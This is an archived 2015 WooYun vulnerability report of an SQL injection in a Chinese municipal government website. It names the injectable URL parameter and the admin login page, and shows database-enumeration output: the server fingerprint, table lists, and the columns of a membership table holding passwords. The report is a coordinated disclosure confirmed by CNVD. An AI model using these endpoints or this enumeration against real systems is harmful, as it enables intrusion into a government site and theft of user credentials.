乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-03: 细节已通知厂商并且等待厂商处理中 2015-08-06: 厂商已经确认,细节仅向厂商公开 2015-08-16: 细节向核心白帽子及相关领域专家公开 2015-08-26: 细节向普通白帽子公开 2015-09-05: 细节向实习白帽子公开 2015-09-20: 细节向公众公开
Rt
德阳市公众信息网sql注入漏洞后台地址:http://www.deyang.gov.cn/manager/login.jsp注入连接:http://www1.deyang.gov.cn/fgw-new/LawDetailPage.aspx?ID=77注入连接:http://www1.deyang.gov.cn/fgw-new/LawDetailPage.aspx?ID=77
web server operating system: Windows 2003web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2000
Database: aspnetdb[23 tables]+--------------------------------------------------+| dbo.aspnet_Applications || dbo.aspnet_Membership || dbo.aspnet_Paths || dbo.aspnet_PersonalizationAllUsers || dbo.aspnet_PersonalizationPerUser || dbo.aspnet_Profile || dbo.aspnet_Roles || dbo.aspnet_SchemaVersions || dbo.aspnet_Users || dbo.aspnet_UsersInRoles || dbo.aspnet_WebEvent_Events || dbo.dtproperties || dbo.sysconstraints || dbo.syssegments || dbo.vw_aspnet_Applications || dbo.vw_aspnet_MembershipUsers || dbo.vw_aspnet_Profiles || dbo.vw_aspnet_Roles || dbo.vw_aspnet_Users || dbo.vw_aspnet_UsersInRoles || dbo.vw_aspnet_WebPartState_Paths || dbo.vw_aspnet_WebPartState_Shared || dbo.vw_aspnet_WebPartState_User |+--------------------------------------------------+Database: zfgjj[10 tables]+--------------------------------------------------+| dbo.dept || dbo.dept_py || dbo.dtproperties || dbo.pinyin || dbo.selectview || dbo.sysconstraints || dbo.syssegments || dbo.tongji || dbo.ye || dbo.ziku |+--------------------------------------------------+Database: msdb[78 tables]+--------------------------------------------------+| dbo.RTblClassDefs || dbo.RTblClassExtension || dbo.RTblDBMProps || dbo.RTblDBXProps || dbo.RTblDTMProps || dbo.RTblDTSProps || dbo.RTblDatabaseVersion || dbo.RTblEQMProps || dbo.RTblEnumerationDef || dbo.RTblEnumerationValueDef || dbo.RTblGENProps || dbo.RTblIfaceDefs || dbo.RTblIfaceHier || dbo.RTblIfaceMem || dbo.RTblMDSProps || dbo.RTblNamedObj || dbo.RTblOLPProps || dbo.RTblParameterDef || dbo.RTblPropDefs || dbo.RTblProps || dbo.RTblRelColDefs || dbo.RTblRelshipDefs || dbo.RTblRelshipProps || dbo.RTblRelships || dbo.RTblSIMProps || dbo.RTblScriptDefs || dbo.RTblSites || dbo.RTblSumInfo || dbo.RTblTFMProps || dbo.RTblTypeInfo || dbo.RTblTypeLibs || dbo.RTblUMLProps || dbo.RTblUMXProps || dbo.RTblVersionAdminInfo || dbo.RTblVersions || dbo.RTblWorkspaceItems || dbo.backupfile || dbo.backupmediafamily || dbo.backupmediaset || dbo.backupset || dbo.log_shipping_primaries || dbo.log_shipping_secondaries || dbo.logmarkhistory || dbo.mswebtasks || dbo.restorefile || dbo.restorefilegroup || dbo.restorehistory || dbo.sqlagent_info || dbo.sysalerts || dbo.syscachedcredentials || dbo.syscategories || dbo.sysconstraints || dbo.sysdbmaintplan_databases || dbo.sysdbmaintplan_history || dbo.sysdbmaintplan_jobs || dbo.sysdbmaintplans || dbo.sysdownloadlist || dbo.sysdtscategories || dbo.sysdtspackagelog || dbo.sysdtspackages || dbo.sysdtssteplog || dbo.sysdtstasklog || dbo.sysjobhistory || dbo.sysjobs || dbo.sysjobs_view || dbo.sysjobschedules || dbo.sysjobservers || dbo.sysjobsteps || dbo.sysnotifications || dbo.sysoperators || dbo.syssegments || dbo.systargetservergroupmembers || dbo.systargetservergroups || dbo.systargetservers || dbo.systargetservers_view || dbo.systaskids || dbo.systasks || dbo.systasks_view |+--------------------------------------------------+Database: pubs[14 tables]+--------------------------------------------------+| dbo.authors || dbo.discounts || dbo.employee || dbo.jobs || dbo.pub_info || dbo.publishers || dbo.roysched || dbo.sales || dbo.stores || dbo.sysconstraints || dbo.syssegments || dbo.titleauthor || dbo.titles || dbo.titleview |+--------------------------------------------------+Database: DYFGWDB[25 tables]+--------------------------------------------------+| dbo.D99_REG || dbo.TD_QT_DOWNLOAD || dbo.TD_QT_FGWFILE || dbo.TD_QT_NEWSSLIDE || dbo.TD_QT_TOPICCONTENT || dbo.TD_QT_TOPICS || dbo.TD_QT_TZXX || dbo.TD_QT_VOTEITEMS || dbo.TD_QT_VOTETOPICS || dbo.TD_QT_ZCFG || dbo.TD_XM_XMXX || dbo.TD_XM_ZBXX || dbo.TD_ZZ_DEPTS || dbo.TD_ZZ_LEADERS || dbo.TI_QT_TOPICFLDM || dbo.TI_QT_ZCFGFLDM || dbo.T_S_ACCESSCOUNT || dbo.T_S_ACCESSRECORD || dbo.[fgw.D99_CMD] || dbo.[fgw.D99_Tmp] || dbo.[fgw.DIY_TEMPCOMMAND_TABLE] || dbo.dtproperties || dbo.foofoofoo || dbo.sysconstraints || dbo.syssegments |+--------------------------------------------------+Database: master[38 tables]+--------------------------------------------------+| dbo.MSreplication_options || dbo.[INFORMATION_SCHEMA.CHECK_CONSTRAINTS] || dbo.[INFORMATION_SCHEMA.COLUMNS] || dbo.[INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE] || dbo.[INFORMATION_SCHEMA.COLUMN_PRIVILEGES] || dbo.[INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE] || dbo.[INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE] || dbo.[INFORMATION_SCHEMA.DOMAINS] || dbo.[INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS] || dbo.[INFORMATION_SCHEMA.KEY_COLUMN_USAGE] || dbo.[INFORMATION_SCHEMA.PARAMETERS] || dbo.[INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS] || dbo.[INFORMATION_SCHEMA.ROUTINES] || dbo.[INFORMATION_SCHEMA.ROUTINE_COLUMNS] || dbo.[INFORMATION_SCHEMA.SCHEMATA] || dbo.[INFORMATION_SCHEMA.TABLES] || dbo.[INFORMATION_SCHEMA.TABLE_CONSTRAINTS] || dbo.[INFORMATION_SCHEMA.TABLE_PRIVILEGES] || dbo.[INFORMATION_SCHEMA.VIEWS] || dbo.[INFORMATION_SCHEMA.VIEW_COLUMN_USAGE] || dbo.[INFORMATION_SCHEMA.VIEW_TABLE_USAGE] || dbo.dtproperties || dbo.jw_news || dbo.spt_datatype_info || dbo.spt_datatype_info_ext || dbo.spt_fallback_db || dbo.spt_fallback_dev || dbo.spt_fallback_usg || dbo.spt_monitor || dbo.spt_provider_types || dbo.spt_server_info || dbo.spt_values || dbo.sysconstraints || dbo.syslogins || dbo.sysoledbusers || dbo.sysopentapes || dbo.sysremotelogins || dbo.syssegments |+--------------------------------------------------+Database: Northwind[31 tables]+--------------------------------------------------+| dbo.Categories || dbo.CustomerCustomerDemo || dbo.CustomerDemographics || dbo.Customers || dbo.EmployeeTerritories || dbo.Employees || dbo.Invoices || dbo.Orders || dbo.Products || dbo.Region || dbo.Shippers || dbo.Suppliers || dbo.Territories || dbo.[Alphabetical list of products] || dbo.[Category Sales for 1997] || dbo.[Current Product List] || dbo.[Customer and Suppliers by City] || dbo.[Order Details Extended] || dbo.[Order Details] || dbo.[Order Subtotals] || dbo.[Orders Qry] || dbo.[Product Sales for 1997] || dbo.[Products Above Average Price] || dbo.[Products by Category] || dbo.[Quarterly Orders] || dbo.[Sales Totals by Amount] || dbo.[Sales by Category] || dbo.[Summary of Sales by Quarter] || dbo.[Summary of Sales by Year] || dbo.sysconstraints || dbo.syssegments |+--------------------------------------------------+
Database: aspnetdbTable: dbo.aspnet_Membership[21 columns]+----------------------------------------+------------------+| Column | Type |+----------------------------------------+------------------+| ApplicationId | uniqueidentifier || Comment | ntext || CreateDate | datetime || Email | nvarchar || FailedPasswordAnswerAttemptCount | int || FailedPasswordAnswerAttemptWindowStart | datetime || FailedPasswordAttemptCount | int || FailedPasswordAttemptWindowStart | datetime || IsApproved | bit || IsLockedOut | bit || LastLockoutDate | datetime || LastLoginDate | datetime || LastPasswordChangedDate | datetime || LoweredEmail | nvarchar || MobilePIN | nvarchar || Password | nvarchar || PasswordAnswer | nvarchar || PasswordFormat | int || PasswordQuestion | nvarchar || PasswordSalt | nvarchar || UserId | uniqueidentifier |+----------------------------------------+------------------+
太多了,懒得去一一注入。这应该也算漏洞吧。而且不止这一个注入点,有很多!!落入不法分子手工就不是我这样了。。
你懂得
危害等级:高
漏洞Rank:10
确认时间:2015-08-06 09:58
CNVD确认并复现所述情况,已经转由CNCERT下发给四川分中心,由其后续协调网站管理单位处置。
暂无